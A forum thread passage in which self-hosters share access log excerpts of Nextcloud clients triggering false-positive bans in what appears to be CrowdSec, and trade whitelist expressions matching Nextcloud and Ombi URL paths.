xxx.xxx.xxx.xxx - - [29/Nov/2022:16:49:01 +0100] "GET /cloud/index.php/core/preview?fileId=012836425251034f3b47f&x=256&y=256 HTTP/1.1" 404 878 "-" "Mozilla/5.0 (Windows) mirall/3.6.2stable-Win64 (build 20221110) (Nextcloud, windows-10.0.19044 ClientArchitecture: x86_64 OsArchitecture: x86_64)"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:49:01 +0100] "GET /cloud/index.php/core/preview?fileId=012836225251034f3b47f&x=256&y=256 HTTP/1.1" 404 878 "-" "Mozilla/5.0 (Windows) mirall/3.6.2stable-Win64 (build 20221110) (Nextcloud, windows-10.0.19044 ClientArchitecture: x86_64 OsArchitecture: x86_64)"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:49:01 +0100] "GET /cloud/index.php/core/preview?fileId=012836125251034f3b47f&x=256&y=256 HTTP/1.1" 404 878 "-" "Mozilla/5.0 (Windows) mirall/3.6.2stable-Win64 (build 20221110) (Nextcloud, windows-10.0.19044 ClientArchitecture: x86_64 OsArchitecture: x86_64)"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:49:01 +0100] "GET /cloud/index.php/core/preview?fileId=012835645251034f3b47f&x=256&y=256 HTTP/1.1" 404 878 "-" "Mozilla/5.0 (Windows) mirall/3.6.2stable-Win64 (build 20221110) (Nextcloud, windows-10.0.19044 ClientArchitecture: x86_64 OsArchitecture: x86_64)"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:49:01 +0100] "GET /cloud/index.php/core/preview?fileId=012835935251034f3b47f&x=256&y=256 HTTP/1.1" 404 878 "-" "Mozilla/5.0 (Windows) mirall/3.6.2stable-Win64 (build 20221110) (Nextcloud, windows-10.0.19044 ClientArchitecture: x86_64 OsArchitecture: x86_64)"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:49:01 +0100] "GET /cloud/index.php/core/preview?fileId=012836705251034f3b47f&x=256&y=256 HTTP/1.1" 404 878 "-" "Mozilla/5.0 (Windows) mirall/3.6.2stable-Win64 (build 20221110) (Nextcloud, windows-10.0.19044 ClientArchitecture: x86_64 OsArchitecture: x86_64)"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:49:01 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7589 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:49:01 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7597 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:49:01 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7585 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:49:01 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7593 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:49:01 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7587 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:49:01 +0100] "GET /cloud/index.php/core/preview?fileId=012836885251034f3b47f&x=256&y=256 HTTP/1.1" 404 878 "-" "Mozilla/5.0 (Windows) mirall/3.6.2stable-Win64 (build 20221110) (Nextcloud, windows-10.0.19044 ClientArchitecture: x86_64 OsArchitecture: x86_64)"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:49:01 +0100] "GET /cloud/index.php/core/preview?fileId=012836615251034f3b47f&x=256&y=256 HTTP/1.1" 404 878 "-" "Mozilla/5.0 (Windows) mirall/3.6.2stable-Win64 (build 20221110) (Nextcloud, windows-10.0.19044 ClientArchitecture: x86_64 OsArchitecture: x86_64)"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:49:01 +0100] "GET /cloud/index.php/core/preview?fileId=012835845251034f3b47f&x=256&y=256 HTTP/1.1" 404 878 "-" "Mozilla/5.0 (Windows) mirall/3.6.2stable-Win64 (build 20221110) (Nextcloud, windows-10.0.19044 ClientArchitecture: x86_64 OsArchitecture: x86_64)"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:49:01 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7591 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:49:01 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7591 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:49:01 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7591 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:49:01 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7589 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:49:01 +0100] "GET /cloud/index.php/core/preview?fileId=012842925251034f3b47f&x=256&y=256 HTTP/1.1" 404 878 "-" "Mozilla/5.0 (Windows) mirall/3.6.2stable-Win64 (build 20221110) (Nextcloud, windows-10.0.19044 ClientArchitecture: x86_64 OsArchitecture: x86_64)"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:49:02 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7587 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:49:02 +0100] "GET /cloud/index.php/core/preview?fileId=012842825251034f3b47f&x=256&y=256 HTTP/1.1" 404 878 "-" "Mozilla/5.0 (Windows) mirall/3.6.2stable-Win64 (build 20221110) (Nextcloud, windows-10.0.19044 ClientArchitecture: x86_64 OsArchitecture: x86_64)"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:49:02 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7589 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:49:02 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7597 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:49:02 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7587 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:49:02 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7589 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:49:02 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7595 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
xxx.xxx.xxx.xxx - - [29/Nov/2022:16:49:02 +0100] "GET /cloud/index.php/204 HTTP/1.1" 204 7583 "-" "Mozilla/5.0 (Android) Nextcloud-android/3.22.3"
13

Hey what whitelists have you tried so far?

14

@iiAmLoz My nextcloud installation is reachable on <domain>/cloud and I tried the following:

- evt.Parsed.request contains "'/cloud/remote.php'"
- evt.Parsed.request contains "'/cloud/index.php'"
- evt.Parsed.request contains "'preview?fileId'"

I even tried - evt.Parsed.request contains "'/cloud/'" without success.

15

Hi,

I’m also interested in whitelist solution, as I have a similar problem with NextCloud Bookmarks app…
Seems like NextCloud devs don’t worry about generating a lot of HTTP errors :wink:

16

@smu44 just take a look at your servers access log and whitelist part of the last urls before the ban. i.e.:
name: my-whitelist-for-NC
description: my custom whitelists
whitelist:
reason: my whitelist for NC
expression:
- “evt.Parsed.request contains ‘/nextcloud/apps/’”
- “evt.Parsed.request contains ‘/nextcloud/remote.php/dav/’”
- “evt.Parsed.request contains ‘/nextcloud/index.php/’”
- “evt.Parsed.request contains ‘/nextcloud/avatar/’”

17

take a look at your double quotation marks. The first has to be at the beginning

2 Likes
18

sorry for the late answer.
Can’t say for sure, but probably yes.
I’m using subdirectories so whitelist rule is as follows:
- “evt.Parsed.request contains ‘/ombi/api/v’”

But now I switched to subdomains and ombi is now at ombi.example.com.
Is it save to whitelist all my subdomains (ombi, jellyfin, nextcloud, and onlyoffice) or would this brake functionality?
Suggestion: - “evt.Parsed.request contains ‘ombi.example.com’”
I always feel like I should not put too many or too general urls into whitelist…

19

Thanks, I’ve made the correction. :+1:

20

That simple, really ? Dumb me! :flushed:
Thank you very much!